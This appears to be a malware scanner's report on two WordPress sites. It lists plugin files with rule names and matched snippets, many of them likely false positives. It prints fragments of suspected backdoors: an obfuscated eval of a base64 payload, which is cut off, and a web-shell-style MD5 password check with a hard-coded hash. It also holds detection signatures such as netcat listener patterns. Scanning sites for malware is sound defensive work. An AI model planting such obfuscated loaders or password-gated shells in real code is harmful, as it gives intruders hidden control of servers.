proc_open($_SERVER['X_SCRIPT_FILENAME'], $descriptorspec, $pipes, NULL, $newenv); if (is_resource($process)) { fclose($pipes[0]); $head = fgets($pipes[1]); while (strcmp($head, "\n")) { header($head); $head = fgets($pipes[1]); } fpassthru($pipes[1]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); } else { header('Status: 500 Internal Server Error'); echo('Internal Server Error'); } } else { header('Status: 404 Page Not Found'); echo('Page Not Found')
| Sign 5aabe84e Line: 13 Dangerous Malware Signature (hash: 5aabe84e) |
proc_open($_SERVER[
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:06 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:06 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-04-30 18:02:16 Modified: 2020-07-24 20:08:07 Dangers: 1
| Description | Match |
|---|
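Function str_rot13 eval_str_rot13 Line: 177 Dangerous The function name `eval` in ROT13-encoded form [https://www.php.net/eval]. The match shown is only the four letters `riny`, so the finding is meaningful only if line 177 decodes that string (for example with `str_rot13`) and calls the result. |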
riny
|
|
//var/www/saratov/data/www/intim-saratov.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-01 18:33:55 Modified: 2020-10-01 18:33:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
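Exploit password_protection_md5 Line: 9 Warning File gated by an MD5 password check, a pattern typically seen in web shells. The matched line compares an unsalted MD5 of a request parameter with a hard-coded hash using loose `==`; if the script is legitimate it should verify with `password_verify` against a `password_hash` value, and the hard-coded hash should be treated as exposed now that it appears in this report. |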
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/saratov/data/www/intim-saratov.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-01 18:33:55 Modified: 2020-10-01 18:33:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/saratov/data/www/intim-saratov.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-01 18:33:55 Modified: 2020-10-01 18:33:55 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
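| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval]. In this match the argument to `eval` is the return value of a function applied to the long encoded string reported above, so the code that actually runs cannot be read from the file as stored; decode the payload offline on an isolated system instead of running the file. |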
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
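| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d). The matched text `Z3ppbmZsYXRl` is the Base64 encoding of `gzinflate`, i.e. the name of a decompression function is itself stored in encoded form. |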
Z3ppbmZsYXRl
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:36:40 Modified: 2020-07-24 20:07:21 Warns: 1
| Description | Match |
|---|
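Exploit double_var2 Line: 1185 Warning Variable-variable syntax (`${$name}`) is often used to obfuscate malicious code; it is also valid in ordinary PHP, so check where the inner variable's value comes from before treating the match as malicious. |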
${$gloabl_filter_ids_name}
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-09-27 12:59:22 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Warns: 1
| Description | Match |
|---|
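Function system Warning Potentially dangerous function `system` [https://www.php.net/system]. In this match the word "system" is followed by a parenthesis inside what appears to be a translatable message string, not a call to the function, so the finding looks like a false positive. |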
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 2
| Description | Match |
|---|
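Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. In the excerpt matched here `array_filter` receives only `$allPatterns`, and `$_GET` appears later in a separate `array_key_exists` check, so no request data reaches a callback in the text shown. |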
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:20:41 Modified: 2021-05-16 20:20:41 Warns: 1
| Description | Match |
|---|
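Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]. In this match `exec(` is the end of a quoted entry in a list of method-name strings (next to `'test('` and `'toSource('`), not a call to PHP's `exec`. |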
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-03-20 21:29:19 Modified: 2020-07-24 20:07:21 Dangers: 1
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2020-03-20 21:29:23 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
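Exploit hacked_by Line: 7580 Dangerous The phrase "Hacked by", which defacers commonly leave as a credit. The match is on the two words alone, so read line 7580 in context and compare it with a clean copy of the library. |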
Hacked by
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-03-20 21:29:31 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-03-20 21:32:09 Modified: 2020-07-24 20:07:21 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-03-20 21:29:32 Modified: 2020-07-24 20:07:21 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-03-20 21:27:28 Modified: 2020-07-24 20:07:21 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/pern/data/www/intim-perm.club/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-03-20 21:27:34 Modified: 2020-07-24 20:07:21 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
